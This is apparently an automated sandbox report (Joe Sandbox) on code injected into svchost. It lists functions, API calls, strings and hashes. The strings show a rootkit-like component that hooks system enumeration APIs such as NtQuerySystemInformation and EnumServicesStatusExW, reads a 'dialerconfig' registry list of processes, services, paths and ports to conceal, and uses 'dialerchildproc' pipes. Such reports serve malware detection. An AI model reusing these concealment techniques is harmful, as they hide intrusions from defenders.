Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	81
Total number of Limit Nodes:	2

Executed Functions

Function 00000158709D3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000158709D347A
PathFindFileNameW.SHLWAPI ref: 00000158709D3489

Part of subcall function 00000158709D3930: StrCmpNIW.SHLWAPI ref: 00000158709D3948

Part of subcall function 00000158709D3878: GetModuleHandleW.KERNEL32 ref: 00000158709D3886
Part of subcall function 00000158709D3878: GetCurrentProcess.KERNEL32 ref: 00000158709D38B4
Part of subcall function 00000158709D3878: VirtualProtectEx.KERNEL32 ref: 00000158709D38D6
Part of subcall function 00000158709D3878: GetCurrentProcess.KERNEL32 ref: 00000158709D38F4
Part of subcall function 00000158709D3878: VirtualProtectEx.KERNEL32 ref: 00000158709D3915

CreateThread.KERNEL32 ref: 00000158709D34D7

Part of subcall function 00000158709D1EB4: GetCurrentThread.KERNEL32 ref: 00000158709D1EBF

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 1baf7535c3410ec2161d3171b7e8283dba7f155e76b9c631a61840aae2f455ec
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 23118E7A798E09D2F7619720EC0A3E93390B7CC707F7480149A46AD1B6EF7DC4568E00

Function 00000158709D1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000158709D1650: GetProcessHeap.KERNEL32 ref: 00000158709D165B
Part of subcall function 00000158709D1650: HeapAlloc.KERNEL32 ref: 00000158709D166A
Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D16DA
Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1707
Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D1721
Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1741
Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D175C
Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D177C
Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D1797
Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17B7
Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D17D2
Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17F2

Sleep.KERNEL32 ref: 00000158709D1C43
SleepEx.KERNELBASE ref: 00000158709D1C49

Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D180D
Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D182D
Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D1848
Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1868
Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D1883
Part of subcall function 00000158709D1650: RegOpenKeyExW.ADVAPI32 ref: 00000158709D18A3
Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D18BE
Part of subcall function 00000158709D1650: RegCloseKey.ADVAPI32 ref: 00000158709D18C8

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: b34a22e42b4636f37a58e54132c6d031f39357f6b9c0fb0c7a883a35a5189ecd
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 2D31B03F244E09E1FB549B76EE4139933A5A7CCBC6F2450219E09AB7E7DF14C862CA50

Function 00000158709D3930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000158709D3948

Strings

dialer, xrefs: 00000158709D3941

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 24e6d656a4f61cbc419910f8b11d390c34721bcd69d414f775461cbaa710d531
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: 5CD05E39751A0AC6EB149FA28CD53A03351AB98716F58C0208A011A625DF58DD9E8E10

Function 00000158709A2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000158709A2A31

Memory Dump Source

Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: cab338042e0fe438dd9005c5db657b42ba637fb7500d9a1f9be30a3e4a1edbb9
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: B66124B6305A50C7EA68CF29D8407ECB392FB88B95F248021DA192B7C5DF38D853DB10

Non-executed Functions

Function 00000158709D2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000158709D2D80
lstrlenW.KERNEL32 ref: 00000158709D2FBA

Part of subcall function 00000158709D1A14: OpenProcess.KERNEL32 ref: 00000158709D1A3A
Part of subcall function 00000158709D1A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000158709D1A58
Part of subcall function 00000158709D1A14: PathFindFileNameW.SHLWAPI ref: 00000158709D1A67
Part of subcall function 00000158709D1A14: lstrlenW.KERNEL32 ref: 00000158709D1A73
Part of subcall function 00000158709D1A14: StrCpyW.SHLWAPI ref: 00000158709D1A86
Part of subcall function 00000158709D1A14: CloseHandle.KERNEL32 ref: 00000158709D1A94

GetProcAddress.KERNEL32 ref: 00000158709D2D95

Part of subcall function 00000158709D1554: StrCmpIW.SHLWAPI ref: 00000158709D1585

Part of subcall function 00000158709D3930: StrCmpNIW.SHLWAPI ref: 00000158709D3948

StrCmpNIW.SHLWAPI ref: 00000158709D2DD8
lstrlenW.KERNEL32 ref: 00000158709D2F00

Strings

NtQueryObject, xrefs: 00000158709D2D8B
\Device\Nsi, xrefs: 00000158709D2DCB
ntdll.dll, xrefs: 00000158709D2D79

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 63d4f02c0403d5e7abc18a286324630a5ea00a4d4eeb093d581abea4177d3d45
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: EFB1C23A218E58C1EB548F29CC407E973A4F7D8B86F649016EE496B7A6DF35CC42CB40

Function 00000158709D7E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000158709D7E8C
RtlCaptureContext.NTDLL ref: 00000158709D7EB9
RtlLookupFunctionEntry.NTDLL ref: 00000158709D7ED3
RtlVirtualUnwind.NTDLL ref: 00000158709D7F14
IsDebuggerPresent.KERNEL32 ref: 00000158709D7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000158709D7F89
UnhandledExceptionFilter.KERNEL32 ref: 00000158709D7F94

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: fe4d7994dcb9cd90d1d8f6a94c807bf571fb46fda8be655a3b51a133ec55a95b
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: DB313A77204E84D6EB608F64E8407EE7360F788745F54442ADA4D6BBA9EF38C949CB10

Function 00000158709DB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000158709DB585
RtlLookupFunctionEntry.NTDLL ref: 00000158709DB59D
RtlVirtualUnwind.NTDLL ref: 00000158709DB5D8
IsDebuggerPresent.KERNEL32 ref: 00000158709DB611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000158709DB61B
UnhandledExceptionFilter.KERNEL32 ref: 00000158709DB626

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 16ea1a5afb74b80a445a2bb85521b88d592ea919e9d250425538b74944ba91bd
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 72317E3A208F80D6DB20CF25E8403DE73A0F7C8B95F600116EA9D5BBA9DF38C5568B00

Function 00000158709DFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000158709DFF67
WriteFile.KERNEL32 ref: 00000158709E021E
WriteFile.KERNEL32 ref: 00000158709E0270
GetLastError.KERNEL32 ref: 00000158709E0372
GetLastError.KERNEL32 ref: 00000158709E03D2

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: e9e697ece340428b91d3096d1657db314af7b788c41ca0ee67ae2ecee833650c
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 8CE1D336608A80DAE740CB64D8443DD7BB1F3C9789F644116DE49ABBA9DE34C967CB00

Function 00000158709D1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000158709D165B
HeapAlloc.KERNEL32 ref: 00000158709D166A

Part of subcall function 00000158709D1274: GetProcessHeap.KERNEL32 ref: 00000158709D127A
Part of subcall function 00000158709D1274: HeapAlloc.KERNEL32 ref: 00000158709D1289
Part of subcall function 00000158709D1274: GetProcessHeap.KERNEL32 ref: 00000158709D12A3
Part of subcall function 00000158709D1274: HeapAlloc.KERNEL32 ref: 00000158709D12B4

RegOpenKeyExW.ADVAPI32 ref: 00000158709D16DA
RegOpenKeyExW.ADVAPI32 ref: 00000158709D1707
RegCloseKey.ADVAPI32 ref: 00000158709D1721
RegOpenKeyExW.ADVAPI32 ref: 00000158709D1741
RegCloseKey.ADVAPI32 ref: 00000158709D175C
RegOpenKeyExW.ADVAPI32 ref: 00000158709D177C
RegCloseKey.ADVAPI32 ref: 00000158709D1797
RegOpenKeyExW.ADVAPI32 ref: 00000158709D17B7
RegCloseKey.ADVAPI32 ref: 00000158709D17D2
RegOpenKeyExW.ADVAPI32 ref: 00000158709D17F2
RegCloseKey.ADVAPI32 ref: 00000158709D180D
RegOpenKeyExW.ADVAPI32 ref: 00000158709D182D
RegCloseKey.ADVAPI32 ref: 00000158709D1848
RegOpenKeyExW.ADVAPI32 ref: 00000158709D1868
RegCloseKey.ADVAPI32 ref: 00000158709D1883
RegOpenKeyExW.ADVAPI32 ref: 00000158709D18A3
RegCloseKey.ADVAPI32 ref: 00000158709D18BE
RegCloseKey.ADVAPI32 ref: 00000158709D18C8

Part of subcall function 00000158709D12C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000158709D1326
Part of subcall function 00000158709D12C8: GetProcessHeap.KERNEL32 ref: 00000158709D1334
Part of subcall function 00000158709D12C8: HeapAlloc.KERNEL32 ref: 00000158709D1345
Part of subcall function 00000158709D12C8: RegEnumValueW.ADVAPI32 ref: 00000158709D13A1
Part of subcall function 00000158709D12C8: GetProcessHeap.KERNEL32 ref: 00000158709D13E9
Part of subcall function 00000158709D12C8: HeapAlloc.KERNEL32 ref: 00000158709D13F7
Part of subcall function 00000158709D12C8: GetProcessHeap.KERNEL32 ref: 00000158709D141B
Part of subcall function 00000158709D12C8: HeapFree.KERNEL32 ref: 00000158709D1429
Part of subcall function 00000158709D12C8: lstrlenW.KERNEL32 ref: 00000158709D1432
Part of subcall function 00000158709D12C8: GetProcessHeap.KERNEL32 ref: 00000158709D1440
Part of subcall function 00000158709D12C8: HeapAlloc.KERNEL32 ref: 00000158709D144E

Strings

process_names, xrefs: 00000158709D1775
tcp_remote, xrefs: 00000158709D1861
udp, xrefs: 00000158709D189C
pid, xrefs: 00000158709D173A
SOFTWARE\dialerconfig, xrefs: 00000158709D16BA
service_names, xrefs: 00000158709D17EB
paths, xrefs: 00000158709D17B0
startup, xrefs: 00000158709D16FD
tcp_local, xrefs: 00000158709D1826

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 0a20dc87c9964215617a8eb43357a2dea1c519e5fc9c146ce02bf7335e8ab072
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 4B71063B310E54E6EB109F71EC447D937A5F788B8AF105111DA4D6BB29DE28C956CB00

Function 00000158709D12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000158709D1326
GetProcessHeap.KERNEL32 ref: 00000158709D1334
HeapAlloc.KERNEL32 ref: 00000158709D1345
RegEnumValueW.ADVAPI32 ref: 00000158709D13A1

Part of subcall function 00000158709D1554: StrCmpIW.SHLWAPI ref: 00000158709D1585

GetProcessHeap.KERNEL32 ref: 00000158709D13E9
HeapAlloc.KERNEL32 ref: 00000158709D13F7
GetProcessHeap.KERNEL32 ref: 00000158709D141B
HeapFree.KERNEL32 ref: 00000158709D1429
lstrlenW.KERNEL32 ref: 00000158709D1432
GetProcessHeap.KERNEL32 ref: 00000158709D1440
HeapAlloc.KERNEL32 ref: 00000158709D144E
StrCpyW.SHLWAPI ref: 00000158709D1470
GetProcessHeap.KERNEL32 ref: 00000158709D1485
HeapFree.KERNEL32 ref: 00000158709D1493

Strings

d, xrefs: 00000158709D1365

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 30c682e7892007fa1e18b4f5837a20ff526662fe64583a20a07c6ad30c6a7cc6
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: AB51497B218B44D3EB14CF62E94839AB3A1F7C9F81F548128DA491BB24DF38C566CB40

Function 00000158709D1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000158709D1EBF

Part of subcall function 00000158709D2174: GetModuleHandleA.KERNEL32 ref: 00000158709D218C
Part of subcall function 00000158709D2174: GetProcAddress.KERNEL32 ref: 00000158709D219D

Part of subcall function 00000158709D5C10: GetCurrentThreadId.KERNEL32 ref: 00000158709D5C4B

Strings

NtDeviceIoControlFile, xrefs: 00000158709D1FF6
sechost.dll, xrefs: 00000158709D1FD9
NtResumeThread, xrefs: 00000158709D1F02
NtEnumerateValueKey, xrefs: 00000158709D1F76
advapi32.dll, xrefs: 00000158709D1F97, 00000158709D1FB8
EnumServiceGroupW, xrefs: 00000158709D1F90
NtQuerySystemInformation, xrefs: 00000158709D1EE5
NtEnumerateKey, xrefs: 00000158709D1F59
EnumServicesStatusExW, xrefs: 00000158709D1FB1, 00000158709D1FD2
ntdll.dll, xrefs: 00000158709D1ECD
NtQueryDirectoryFileEx, xrefs: 00000158709D1F3C
NtQueryDirectoryFile, xrefs: 00000158709D1F1F

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 943178bbab4604f49a565a5b29f4ee87ed4abebeecc9c2091b872128623959fc
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 2C31B37E158E4AE0EA04EF64EC517D43321A7EC346FB1842394593F1779E388A6BCB90

Function 00000158709D23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000158709D2405
GetCurrentProcessId.KERNEL32 ref: 00000158709D240F

Part of subcall function 00000158709D19AC: OpenProcess.KERNEL32 ref: 00000158709D19CA
Part of subcall function 00000158709D19AC: IsWow64Process.KERNEL32 ref: 00000158709D19E0
Part of subcall function 00000158709D19AC: CloseHandle.KERNEL32 ref: 00000158709D19FB

CreateFileW.KERNEL32 ref: 00000158709D2468
WriteFile.KERNEL32 ref: 00000158709D2490
ReadFile.KERNEL32 ref: 00000158709D24AF
CloseHandle.KERNEL32 ref: 00000158709D24B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 00000158709D2438
\\.\pipe\dialerchildproc32, xrefs: 00000158709D243F

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 10c61dbd0a57fbc221ac1cff4fa07a250fad4ac49ce6646bc7a0ffb9c29d1d80
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 86213E3A618B44C2E710CB25F8483AA73A1F3C9BA6F604215DA5916BB8CF3CC55ACF01

Function 00000158709D104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000158709D10AB
RegEnumValueW.ADVAPI32 ref: 00000158709D110E
GetProcessHeap.KERNEL32 ref: 00000158709D1155
HeapAlloc.KERNEL32 ref: 00000158709D1163
GetProcessHeap.KERNEL32 ref: 00000158709D1187
HeapFree.KERNEL32 ref: 00000158709D1195

Strings

d, xrefs: 00000158709D10CE

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: f332a3c4f0c717dae104b879ec849a6d65aad32391179d5c77b2931008f5e50c
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 5A418237218B84E7E760CF61E9447DAB7A1F389B85F108129DB891BB54DF38D566CB00

Function 00000158709D75F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000158709D7618
__scrt_acquire_startup_lock.LIBCMT ref: 00000158709D766A
_RTC_Initialize.LIBCMT ref: 00000158709D7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000158709D76BE
__scrt_release_startup_lock.LIBCMT ref: 00000158709D76E9

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 25e611c82109a42443ca2a13553f23dde90b8b4a93b32d479df0bf77dbe5ecb3
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 4C81A039788E49C6F650EB659C453E9B290A7CDB82F78842599047F7A7FE38C9438F10

Function 00000158709A69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000158709A6A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000158709A6A6A
_RTC_Initialize.LIBCMT ref: 00000158709A6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000158709A6ABE
__scrt_release_startup_lock.LIBCMT ref: 00000158709A6AE9

Memory Dump Source

Source File: 00000017.00000002.2690081130.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709a0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: c2b72a5e78754227d56dbd305acf4b2c440957351f12af5e70819825c413278d
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 3A81B3B9608E41C6FA509B29AC413D972A0E7CD796F344025AA85BF796DF38C847EF00

Function 00000158709D9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00000158709D9889
GetLastError.KERNEL32 ref: 00000158709D9897
LoadLibraryExW.KERNEL32 ref: 00000158709D98C1
FreeLibrary.KERNEL32 ref: 00000158709D9907
GetProcAddress.KERNEL32 ref: 00000158709D9913

Strings

api-ms-, xrefs: 00000158709D98A9

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: ef8892e24330d55c3490a5fc64bcc720dc366a49e0b2ea068d929445bc262a23
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: BC31B43A35AE44E1EE11AB02EC107D97394B78DBA2F6945189D2D6E392DF38C4568B00

Function 00000158709E1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 00000158709E1BCD
GetLastError.KERNEL32 ref: 00000158709E1BD9
CloseHandle.KERNEL32 ref: 00000158709E1BF1
CreateFileW.KERNEL32 ref: 00000158709E1C1C
WriteConsoleW.KERNEL32 ref: 00000158709E1C3B

Strings

CONOUT$, xrefs: 00000158709E1BFD

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 678e6a64ae77ea35711f9060b52df17e6f0dc571c900bb9eb1b4d58fe10832b7
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: C5115B36215F40C6E7508B56EC4839972A0F7CCFE6F244228EA599B7A4DF78C9268B44

Function 00000158709D5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000158709D5C4B
GetThreadContext.KERNEL32 ref: 00000158709D5DB5

Part of subcall function 00000158709D5A40: GetCurrentThreadId.KERNEL32 ref: 00000158709D5A44

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

